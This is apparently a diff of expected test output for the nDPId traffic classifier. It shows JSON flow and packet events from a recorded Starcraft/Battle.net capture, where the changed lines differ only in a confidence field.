-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985945,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/0x\/0XQ1VXR8ZR271434128527471.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985931,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/yf\/YF9PRCZXJVPZ1428591254317.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985945,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/0x\/0XQ1VXR8ZR271434128527471.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1437389985955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985955,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcsAWb5HysuLTYASOQgfxgAAAgQFtAEBBAIBAwMF"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1437389985955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985955,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOxAAIAG2oPAqAFkAuQucA3LAFDKy4tNAFm+SFAQAQCYngAA"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985892,"flow_last_seen":1437389985955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/4j\/4J7OUIISCLTQ1436943629210.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985923,"flow_last_seen":1437389985955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/fa\/FA512IPUN0SE1436979936388.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985892,"flow_last_seen":1437389985955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/4j\/4J7OUIISCLTQ1436943629210.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985923,"flow_last_seen":1437389985955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/fa\/FA512IPUN0SE1436979936388.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1437389985957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985957,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcy5z5mcpluU3oASOQil2AAAAgQFtAEBBAIBAwMF"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1437389985957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985957,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLO9AAIAG2oDAqAFkAuQucA3MAFCmW5Teuc+ZnVAQAQAesQAA"} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985960,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1437389985960,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985960,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LPVAAIAG2m7AqAFkAuQucA3OAFAbejKQAAAAAIACIAD\/hwAAAgQFtAEDAwgBAQQC"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985961,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/78\/78XH2UNU4JYK1434560551687.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985961,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/78\/78XH2UNU4JYK1434560551687.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1437389985962,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985962,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDc1+R6dFIysb3oASOQjP5wAAAgQFtAEBBAIBAwMF"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1437389985962,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985962,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLPpAAIAG2nXAqAFkAuQucA3NAFAjKxvefkenRlAQAQBIwAAA"} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985962,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/mf\/MFTH8TS42HKX1430183778319.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985962,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/mf\/MFTH8TS42HKX1430183778319.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982825,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982825,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389981134,"flow_last_seen":1437389981218,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00703{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389964518,"flow_last_seen":1437389964635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":777,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} -00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389976946,"flow_last_seen":1437389980126,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389981134,"flow_last_seen":1437389981218,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00703{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389964518,"flow_last_seen":1437389964635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":777,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} 
+00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389976946,"flow_last_seen":1437389980126,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389985821,"flow_last_seen":1437389985912,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":388,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389985821,"flow_last_seen":1437389985912,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":388,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1437389985891,"flow_last_seen":1437389985996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":35189,"flow_avg_l4_payload_len":858,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985892,"flow_last_seen":1437389985994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23509,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 